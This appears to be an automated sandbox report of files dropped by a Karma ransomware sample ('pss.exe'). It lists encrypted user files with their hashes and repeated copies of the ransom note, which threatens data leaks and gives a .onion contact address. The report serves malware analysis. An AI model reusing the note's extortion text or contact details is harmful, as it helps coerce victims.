MD5:F9EA9DC08E66C109E27CB43302F09720
SHA1:CCEE9CB0FF61A3688B7609606056AE412EFACBB8
SHA-256:0812A78EB76CEB97B92BBAF7EFEBB55E3CBEE04ECD9D5B0F246AB2D05037033D
SHA-512:E940CB434E5BF1E0ACBCDDAE87BEF470828F98C63805FA46352EBE7B1BF4AB7C8E57BD9CAC9ABABC034EDED4B15516A99F8BF5195E1B7869ED47B65B2BCE26C6
Malicious:false
Preview: C.U....D.W.8u..h.R.....<.2:...-..}.....8.R`*....d..C..%...+...KARMA..vh|S..|1....2.%2..-Do..#/T$..h...Z.u....{....e9..%D.@.aI.1...u.......[..@.`............% ..W..k.-..d.2.7.x...N.~... ....iLd.{....v1....TE..8...9..;|Yt...P..&.w,D..y...."..5......u..ff&...qk..j.."..o......z.i...@.F.......y._.@........[.%".\!BD........G....G.....H.0I......%..J....^..8'.-.../".P.Z..p.4<....=..yi...t..m9c;...M......*.A\.O:5I.....3g....o.H(.D....."..4J....{....c.....'!4...t."s...d..b...|.h...&?..g.. ..-;vW.}.$.x{..%.BCl....+...A..Y..........Z....A8....%..>.......R.L.b....._r.$I...Q..f&.7u.D.S....{].i...#..^.Z......n..........<..p.H..D.._7.FNK.+V..6.D..R3&8..{.c.G.q.....u,.uv..qe.p.]I;.~..{..../.UP:W^#po..n.....*O.....0..._i.......l<@..... ...~.v~&.j^l.J6.R.W.l.U..c4....6..d';.*..^6.2......XO....X..4L....J!.....F+.M....}.GK........~......<..?e..4z..v^k.Tp..&....R...`..gE.$lk..pmA.q......I......y.....O...u;-.0........-...ky..9h...$;..'..0.g..OA,.).L1]....
C:\Users\user\Desktop\QCFWYSKMHA\EEGWXUHVUG.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.811268651205095
Encrypted:false
SSDEEP:24:TcINH4hlvMOURXwhd4KQyZasE9qvsDksCNWvalB5ciKpuB2nrlECi:4MH4hlvMOewhmy9eqE0WKBguBcECi
MD5:D6F84671D3DEA6E9B75165C041109374
SHA1:11D9692F5AA943E1E8FE38C8CB2025E58CA79064
SHA-256:6B31F2ECE9588DD723D3B34528F4706ED7195D4999B0D1B376352130AC9E5BC0
SHA-512:A9FCEAD3B3FC919779AE0FD77A5D58EF024AB1FAB03B1505CB36769B45A52A94E95338CC40458D427D865C6949617A0CDB5D20606C9F149A2248CE662302F099
Malicious:false
Preview: .......$.'.t).q.C.................T.lo#....X..f.?..Nd.m.}...KARMAe..P.o.....R.....z.J>o2.U.....I.I..M.....{.......r...7l.p.v.L.I..G2.Z...".4jX.0R.#.-..OD.......r..I*........{.(q-....._...p.4J..xXD....X.\Q...>..Sy..Qt....e.>`Uy5..;F.G......../r.B'.)cx....{Sr**...Cfbz...]]../..|....G...I.^....b..1K.u.v..tr.)...Z....`........w.d..+.\.....E...A*............L.^.m^...v..h...<;..9z.,........#@.Sg.V.y..L.O.7.......j....j.S.n..K.x..x..F......O...0 .|.P.....5B.rK@.$..q..$....N<X1.q...."....(a.#...I.!-......4..h....S..e`..C.V.y.s..~...:.N.QCD..-.%f.U.n+.a"..R.u..S...G.D.o.GJ]..V..X.T$..5....]d.H...e....>..hQ8h@.E.....Nv.6$...o|6..2.$.....'.../f4...!G...L...j.....e...K2m....*-LH.....@.......Z.u..2}.i...4.Z".....-.f.....qw.'..K^m.J,.....8..98.....i............JX...A..w...*LZ.".....o......a...c.._.?Qoqq.-..vo.r.P......T*.........f.c<8]...H.J...8LR../.zXA.[%..q....".1.!M.).~V..eN.n.*Y..+4m.z"64;.i*..q.A.?.h. ..ad5.W...6Z...&{.M).......V.wm.A5$..~.M_..sen.
C:\Users\user\Desktop\QCFWYSKMHA\EFOYFBOLXA.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81757232025939
Encrypted:false
SSDEEP:24:z4e+k0389GfD+T18fJLZTLFoEia6enyxhOQ5b9aVQGALoJ1t37Oora:zPw88fD+58rAaTyxsQcVQGh5/ra
MD5:B2C63A14DC226E90C5A776E69BC45107
SHA1:1A93EDFFDB5C80B862DE173C8D2B8FCF4AB50C4F
SHA-256:FC409361EF65E56F6C4F5805C2B5611CF59EE6781AB76C83BAE86DC318D3AE4F
SHA-512:203503F68EB9D178A1A31ACCA5BD30816699B71E803CD1850A5C03F571147031C69D2A83EE7EFDB50914ACD5E3D99D7F18E2C6A01028644D48B9F52E211F56CA
Malicious:false
Preview: .C......L.A."(u.RJ....Hl/...G........0...1%.v@]L....}.....N...KARMA.R4.B....K...LW.p.E4.C.,.&r.S.m...R>WX....'.(.w7.1.\t..H...G...Q_.l....0..J.$..S.tc...., .}..R.5:.E\..b/.:9qb.`..0..wg.S..=..U.8PN~..|j.w...Z......t9....nJ].v..I.r_T.{N..v...*.....{....gk....2..r..14si._..z.QHZ..3|{.>.FI.!d9.X.G......@.Aq7.........~.<.X...|)..4[ys.....;.6./...?......=K.X%.....?<....$wS.../..;....}$....}....N..B..........g..%W.....M..0..ts@vrg..N.`.../4.o.h`...(.bl.......I..G.2.e.B.HDv...$..].kz.k.*r.....".<.Q.).{4*.AB..Q"(].&R~...Z%.].T..B~Y.3..).....D.{.\2....jg..O...V./.....t..5...ovg..P0........M..d4..%r.7....ys.q....N.K.:.....c..}.`\..._.).....K.......k..L'uq9B..kxXa../.lw.L9...qU.\Z...7.S..T.!....,..@1......Z|.O~kk.`_....(.~a.v0.a2.i...*'.T..9..~.-........{.6.~.."=.A.l`.`...}.=.~.F.B...c<3y.y....>.P.........iB..8..z.K"...9c/. Z..!...K'@..1.>.....a..@Q...m..Q.J.......gt.......#.zq....,... H1....|................ZK.Y4..`h...].....\.M&.(.sd...g.v..s^|..`.
C:\Users\user\Desktop\QCFWYSKMHA\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819987576366232
Encrypted:false
SSDEEP:24:uGzPF3iVmoJIX35dkd6FZltCWaKnIiZI7kELHpkKxsRQFeIXdc9vxsXiK:nztSVmN52d6FZmW5IfkQyMVc9eXT
MD5:134009ABA8DCD310E3DEE8AF045F6874
SHA1:B33A3F4105BF6301BA3546C6FFD88797B07CAC79
SHA-256:8B1EA5DC0B36FF110928A3337D4BB9DF983DAC6E576A0FEF0F079673E46E57F0
SHA-512:905FBB1F543AD6CF7A65E49713812FE7B40A1630289A3561C2CF77CE6581C98455B6B68D4DEB333FFF0FF01EC836EC2ABDE0F6512A770DB6FC5CAB93A705A910
Malicious:false
Preview: v.pk+.I..t.q.Mf)....N.7.0..........:)Og..dC....;q....c...Zt....KARMA...Z..".....x6-2[".b..q{^.....&q..^.:+.]....V:r..BA...P.H.}....f......D0f..jg.....S.5.2....)..qt.Y.&..."..u..gZ...-I.8.r.....|....9.R.q..t.^..diZ..p.......o....C.....(..|..=*..N.......L[Z.8.:"*..T.I/..P..N.......\v....".4..L.9...u%..j..L....p"F.o.....!BrzEh8.......F.*.5z..}.....:.pG(..q.d........&$..N..h.&~.'.(.....'?"....R..".L...C...H7b$..oX.8.a..fQ..Wu4..|.<...;`...[s-d.?..^/..L...(z.EG..X.J..@JQo?..L.....nw......... .=.p....E.LN\.........k..u=..mM.......U"0pe..j(Rp..uAz.......K ..,.0.....f..~[......2X.......U...1......Nc..&.!5.s.s...<..x>.....i.%.L..|I.}6.5.vx.+jpzu..:..Z.fu...s(/].....%`.b..mN.. ..[.w.]....y...q)e.Il...H=Z.(..1..W....../.%.i...$.8.|.R%=..7.........6...~....dI..f....n...<...Y9i..*...J.......X.V..y.s.....-Tg..@...G....q...=.1l.C.. >s.E.-x.5.0....;f./}..;n...c.9..z.......:).M...t.]...H.a..]H:>.=b...wM.o.F...Q{h.j...(.T...c.9..XK.F..Q..../..l.......f
C:\Users\user\Desktop\QCFWYSKMHA\SUAVTZKNFL.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.836297220820901
Encrypted:false
SSDEEP:24:PYX48nATwYDZ0h88hqu2/gghYd0UuGPAr3YQuyNX5qlc3om:m4YAE9u8hqumYTf4bYhc3om
MD5:1AEEC87A119B9D92DA70AFC39ACEBF6B
SHA1:098CAC0893D447E3A0AFCAF550C724B5EB228B28
SHA-256:0B1C7EF9C64707CB9DBC4CD3962B16C386C7DB394D74FAE249D9C1114400DBD2
SHA-512:FBE227F3414BA8420CAD83530761BFADA2BC6BEE409E21F7DBF73D122007A1A1CD9D83A457E1A6FC5672D98F83AE735B869E1E385C01CE6CE838C412A74150E2
Malicious:false
Preview: &=5...h........I....J.........{..i=.%......T&.....#?l>...KARMAz..........@....*..... B.>f*.T..}So1......g<....h~.G..8.@.....G8>.K....#.....h.R%x.....q.:"dE*.#.}b..B....R9.;.y`.W...#~..........M......(-..?.]&...)..f..U.L.7...-......J.%V...oN.!r...Z."...W9.e......gy.B..V>.2..2. Z{f......Ug.....x...Jy.....8....h0T.e.S.......=......k.).6n^V.[...%Yn.n...6.5.....Q).......3='.6D..d.P.qn.....uZ..!............."< ...#...2...J....?."....]:z....w..AA.../...Y...Q..b..Y..U1RTa.3r....L|..dW.i"f....._."..g.!.N".....'.....,..'.*..y.PS..4(..l~....B...O.Gw.ez.>..2..%.Q...B..P0..RO}V...UM.@....B=......w..0.`.l.2...}&.PQ........U.%.`......[Z.hK......&.....c?...[.bA.4/..T....g|@Lw.de.&.JcA.....C....^3..t1.:BF....6.......\.....DLjYf...~[......."&.N@$.s..R...g.*j.[gT.-.om.Ia'......aI.?l?@!D0dH'...E.D.iM..#..+.....b.=E..W./+.uq..O.U.9...$P.......<.....E..u..y..}t'....tB1}...(..hk.G.~..A.X.:...i.1.A.N..*..X.B....xlP'..;...C.|.7.%E...+.e.....d
C:\Users\user\Desktop\QNCYCDFIJJ.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.814016358271029
Encrypted:false
SSDEEP:24:7uqTzUsCayQ2qdYcHkH7UbXxSbCR3WHhv74J9ODTz:7uiCpQ2oYcEbhC5Wx74fOXz
MD5:063FA7A40F8847FB0D80EE0E8AC73447
SHA1:95A8A90FA2B97E5B432E8938018C51A312C8CCCB
SHA-256:6B22A1E7C07445F43A2857DE8365132B2967E92EADFAF2626FE6178F8469FC74
SHA-512:E9788BF6943A5ED93674306C98C5CD76B5EADD43B991B96A09C1786B3F2669FB61C05395D05C7A250305A75C468CFA54E019E9927D27AB047196EC23A8F454C4
Malicious:false
Preview: ..X,.q.<..z._....S...):.0..*....ER........%..5.f..A.&..4...q....KARMA^.`..I....[J.m.........|..q/u]l.3.^...P.6...W&..<...[a......$.2.v..Y..IJ.....D_..\..A...F....I#qu...k..y.p.0n~/6..K.kQ......]._..J..7.....J.......i.....;.i..S...0..)[Q.v!f......S............(:....2V.g.p......,GN.}].....P.^.....$z...5`GD..d.CJ..)..Y.i.s...;I...n..QK..^......@jW.....u..1..'V.(..{..y..|@.m.d...@ER....3d..._...z........i..x.|.......D.6.S.hu..f...ri.+Xb......1..A`.YAS0`L...n....`X.....v.|2.]O.".>}.AQ>.../.Gb;w.j..n.K...MU..&..|.....;G..,.t...6......}.Vj..n....F.}.f...4N/fu.s8......<;."...6..Rv]......Z..i...&..+.t.a....6.D.K,.z.cV..~S.Z._.v..95a....t.n....V.A.......P .H*n#.P^..fQ..-.g..s..C.-._..'z....Y......7.!S..!..^.A.....m.-...........r&.n..C...1.4M....]."4l..f.j. . .T....}in.:-..dW-{.4.... ...,h....N..F.*..F$.y.*..`D..E..}.,..{...Py.q.u...e[.a.%.....Ah...,B....M....PQ......:k.*H.,?.*Pu.|....6..u.7.. .[<Y.a.!..pa....:..0...Oc...../~4.....X....{....b.m....
C:\Users\user\Desktop\QNCYCDFIJJ.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.802170980754228
Encrypted:false
SSDEEP:12:Q8qgZZBsNHhM4TqlFQfijgza6wr8oc+oHp+hYqlJAeXOB7TM5ZAnMj4ZgCsnmCny:6gv/4KCKiavr8oc+uAhYQLXiAaA4yZA
MD5:1F8A53729FA04BA72E8157F54A8FB6C1
SHA1:9716FFC0FBFFDA8075904C25B7BB7220E183FA35
SHA-256:DFB2886CB00065B81B8603B3C25C002007773194DD330938C4BF7ED41EC04376
SHA-512:320F543C24126E5EB202DCDA62119CE1C60BE0DA1B3D7A6DCE1BDD0518CD2D4C6EBC5E24E5106688A7F1E44B15B080A4D9CF531B78C0E023EB5C8F30F87EEB12
Malicious:false
Preview: %..h.......:|uN'7..L......a...T$A.+....e...+...K....rG....KARMA.J.T.k....T..8h...i..3.Ed.!....5................G>^..[.....V.e:6n.yc....8......."{.......+'.G...t...a.t...~.M.........q......Dq*.!.....T...F.w.......sx...0 !....+....O..w.(..R>.xk..../.5........I...ME_;..e.(..3..ki....:.E.......Yq!.....k...9.E.9_..}..7E....f.....2...0-)....U...H..=...%.{J.......v.1\.gT...Y......|.b..../.3K.6.o ..!..$..G.....F.3....E.eJ.K_.#.$...oDK.....JN..O....$}..Y2.|FB...4..B...c/c......N..&.J.U...q2iS...<J.N..k...o..(..'|.o;.k..y.6..Q..k.;....F...^....J.......M..ww.....w....u.wP#${."..M...X9>.t..~..........'.z!.+WLY.n..we..-(%.M..&....X]7_C0.....X.....N..R.x..>..:...H..{..B....r..o.....MR.=7..K...+......:.u:....T...&...e'...H4....e..ZY7..N.o...T.n..RK.o..7.K..l.1.].......J...Q.VQ..!.Q.d..b%. .h.p..j..L..\]..B.&.^.-..5..Pt|7.C..'..L8]..P.j...~....%..3q...l...,...z..s...K......e. .[..'`.@./...~....T.....}.j.^.-.u8z..h.,k...1.9m}..{c..9o@.xx.
C:\Users\user\Desktop\SQSJKEBWDT.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.815072333316551
Encrypted:false
SSDEEP:24:vaVT2jq7a1EKEjjqDJorVh7NOKnizW3pdyws5PVf1xkcSHz:O2UOEzjeorN7Ksby35tNcz
MD5:9C523DFF5B5ADA1CE3FDC2E8A0479AAD
SHA1:64FB9BBCF46DFCA6CA5F46706510CC587D23836B
SHA-256:B1FA5F4F069272C701CF931AC5250B6CB30609F623F2CB45F3F4D9D273E21A57
SHA-512:5EF5E74715C8D7DEF8F4539B042F474DB13134935F1547D62C58ED31083B02BB01D564208916E776D44F20B4B9F7BCAD32FEC53EAB3E33CD8C3846329812A22B
Malicious:true
Preview: ...K.J....`....J.......~E.v...\"....K...=}z....6.f...uF...KARMA.*.X.x.@..)I.......`..W.&.d"...GF.`..v`B^...w.2.~MFRJ....f%..H.-,G.3.....20....`........T.........I...H.E".......t...#.HU..Sq.0/.g...g=.....$.I(.Q..a..W.3.&+wY...?F]X..I,....}....e..k..mFg.5@..9.2.,....~.o......z...]..".......Vc.c...m..b.1d.:...q..E..)Q.....6.k..l.%..+.<.o. ...O...-aa....J.dw.....6(.fW<\..P.o."...~.....G...+..y.V.bjI.wJ....f......|.....3CJf.7.2....=6.yj..c*.o....@...K.C....5.?.RS#..:i.6.%qIu.@....%.ar..cJ.....=.F...z....1..]v..i.....g.c.L..gGb...7...i-H y...rsVSGB&.dv.T...queWe.=.<....C........u.?h:W..:.)..R..I..,.Q.P..,....."A..../..i.Bi.......}DE.@.|l..-F....29..G.g88.(..4..~.^...]|.@.l.F..W.....,.U.A.3.+.r3...4.uv!...WP...0.8..hS.t...({..u........b..bo$.E..-.^x.e...-}.2.....xgU.X.o..|.T.o.m....W........8..Pe(...C...".K......0^'..(.%bB.X?.#c.2...W..n>.0'q.w<.C.,Vk{..dy.4..v^.......v..L.r^?21.t...B....S.D..........$....[...$$..F.D.Q..e_..|z._.^.:3.....n.Z..=..z^.
C:\Users\user\Desktop\SQSJKEBWDT\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Desktop\SUAVTZKNFL.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.805569226974544
Encrypted:false
SSDEEP:24:AuW95wHllXXfQR+v45VJmxC29YEXiL7lgHcclRklM+agTHDpSs327Lxz:pI8nnfs+v46qEXiL7SvvkaFgR3+9
MD5:E14BD386F3D926DB3BE076472E487359
SHA1:0BAD4E95351C50406DECB9965F0AC599BB1CAD73
SHA-256:A9EB80C5D668379285B009D6D47D9B5E9AFE11FF3E077AC20D18CC0915F1331A
SHA-512:C6B2B40F350B472701FACFDE15C38D31C1DE3708850F8C46670AEF65DBDA2AB617542964BEB5D683223AE91C2D7256050F8AD9A97B7D18D1E5B4B0DA24A75637
Malicious:false
Preview: ...........?.&P. .2.... .Rj+..........&.=.....A.*9...1.......KARMA.Uf.D.;,.JGR+.0...iU...v..0.....w..o...w....i...h.R.....E&l.W....]..j.....aX...<....5...Z.h.......>.......\o....1.&..l.:^..x.W4...q.6`2..7.f.......4..v...}...H."..G. .P}.../.k.....8w..<(..^..B.c.....?nz..bf..b.".&*dIN....lK...A.6..d.Tg.j....Z....=..=...*E......Z.8..].5.P..V..o...z..WV.q...a2.w?w..o.f6....\...~.s..<......-..*..\...'..._...g .....VO.%.~.......d.....F{Q.o.~....>O..gD.(v.....*..`.,w..{N.AJo<.....e.`.....a^>[X..<..!..|..9[...K.........=71.\...V.G.=.K.6.s...D..P)FA...E..~.q.7^#.6W.;..).HOv.N.....b.T.<......?T...Ux=..i"2E.oU....S.7.L..(.!....DT...5."KKf...UQX.x..[C...h.L.zM.,#..V.y7T'."a.$.4......k..tL.3......+...h..........d.....e.>.|.@. .}<l..#K".^.".fx/......8.....f..).6..wQF.L.tKQ.Z./..<...!z}..Y.Q<q4..1...aL..,.MH.!....A.......J.h ..;.W..H..nC\M.b._B0....M.....r.M....D.u.b..N..&).v.:;=.(.7).......*.P-.M....U.V.(.&.).z..KI>.g..P+.8....<8.x...S..t*...........
C:\Users\user\Desktop\TQDFJHPUIU\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Desktop\ZGGKNSUKOP\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Documents\BJZFPPWAPT.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:DOS executable (COM, 0x8C-variant)
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8483544477333265
Encrypted:false
SSDEEP:24:bSIKr7R7MKNGiRfp8phYILLtc3YH3sxEi:bSIKPjNVFiH1LRIiuEi
MD5:82044CDDF69185B6CC3F5408EB0E5F72
SHA1:0622C895ECF0B48DEB9089799F21375B3883A87B
SHA-256:7CDE1BA681C3B476D8FC20FB221C2967C8D112CE185A39D44A1A6FD3D66FD695
SHA-512:D8C667F3CCED44E4E90840A68A515BBE9C3A940253E2B5080E05501A9EAEB855B0481960A1F6E8EC31F0943690B3530B2D0219066498A661DD94CA6BA046319E
Malicious:false
Preview: .X.A)v...t.Y:.bz...4.:.^..,..........?...KM..l....N.(.'S>.f...KARMAb.em.59fQ.....].V]...a:.........B..NO.166....8s..D...I....@\1.p......aM..t.g...__..o7.0..y.M...e}...8..^.`..L2...DOX...$...Nu....K......x`.W..F...no...woo..).s@.......u.1....Q.o..S!86H.du!L..A.mxt.@P6..3d..7....6.5WC<I..jx*..>..9.Z.1.......q.g..H.j.l..z....r.0.!.L.n ...k...I...}..+....DX.k."e."b.ox.."V]?.n..E...,?E...@..m>M...-.R.....b...P..>.r/.....f.".......pR0. ..n.'..r..y.).S.....=E...V=/w..||..".....&......MM.....P..5.f..q.qg&74<.X..E.......@..Z..E".B.J{..E.d......^..a*t.U.+|..~i.%8.2lW8t.E^mCT.|./.. .....q...0..:.Q........w....9...f.6.........+>-..\q.5.n.|R*./.1B8.W.D..|.<}#...K.8........k`....Cv..V....d.`.8.VG.~..W....[..._.L..%xR+..(.=...xC....MdS...{.Y...+...G...../.F`.Kr...)~..K*.Z1b..../.\.&/.#34I-.....1VSY..yT..ap...i.hX..#....yb..OOZ.S.........h=...'<B.}.w.....aj..............c.l`g......v,P.I.7.DG....t...@G..^....j.(.O.F..K..|..r..........#..'7.^@i...).
C:\Users\user\Documents\BJZFPPWAPT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.807591287377502
Encrypted:false
SSDEEP:12:o1ID8PdaVYLRiXKQ+JBo/XgYF5sK9L6a+AXuDU29YecZHAJxkS/rK9Y2KHYOBapo:AIIPdU4GaJBMQmjV+kSl9YHL9Y2KHNh
MD5:44EAFDB13BDD90CDB59FDC3A2D18FF80
SHA1:2AF6D3C14DDB4AE33B03A69F1B14310A55DFA29C
SHA-256:32D5A008B43FE3D0169F1573C91E6C686124FC4D1FEBE645F2470371E205E1C0
SHA-512:60BCD7614D07CE391FA60A8DFECD2D05AC26E711F7CF4065C79082865A9264FE64C8BCC7BE6A574B91473EBCF3176430DA21BACC370C5F097642781054EC8C3A
Malicious:false
Preview: .r.5Y.^j...5.@.c{../n...#.\....Z.ei..f)..?..r..P..zI5........KARMA GH..n.k.f>.XC..vF..r{.!.9....fJ.SK......&...;u...lM6....!.....b.`'>.K..1.)..K..M........JhEv..9A.T%.....d6...-T9.t..~k.u..'A......t.2.....s........\;.u...n.V.]f.)G...a..1.(.K......GSBEn.....)..~{...,...Q....CA..0.e...9Q....f+...-m...........-4qQH...e5v....F.4,......v.f..q..........pr....>Ew.yeO.S..4p.{#.:.........n...OWi=...5.e,n.?.8.24..2+..^..M.i...R......j*...'.w....8W.0H...w.g^Yf<f..[..s...2..X..?.;.....t.9....hm>..o.)h..../.F.......[Ql...g.....&.A..D5.^.Z..;..f(..S.#..J,A.9l..R..5........`a*.j.j...m?.0m.7...BHG.#..'%..=S1"D1.........(.w..*.xp.....d...../......Tn.Ad)...$..d..D.om./...R......9.)C.._jnVu>/......{..\y...4"zt....G...:x....H.\...._.J........X.}.8...k....O.T...*z.=K<..\.....Y......N..../....N.....&S...q.:f.hp{........|<.s.)x',k..!........O_(...3..j....Pi..n.2...Mh.N...]<....H.:<e....IY.E..m...+.u6L25.>.t.(.i...kF.....t.v\c.'.G....J.h.:..>.Y...[7...f..q<y...(....w
C:\Users\user\Documents\BNAGMGSPLO.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.789259349306412
Encrypted:false
SSDEEP:24:P14kOJ3rE+bqFCcneD6PMGlDc9JkddyiooFkuRSEv7oxLyQR/fDR:P15OJ3rmF7LlCJkeGfoxLymjR
MD5:DA18E7A8B3EAEE39212594F6EB04DDDF
SHA1:B70B9D864163A50E2B7DFDD3D01D2DC0DA52D276
SHA-256:D4EB85C16EF36C37813CD9EA1D92A3C456D61BC272304F9EB7103B8CA40C4900
SHA-512:007DC91416CE28A93673496AF60A7B7E282055FD9C64BD2D1EE7AFD0CB8D491B5C55DB525D771D2E00FA24D2E5A4AEE41EB24B2F9426247C00927F80C3FBC782
Malicious:false
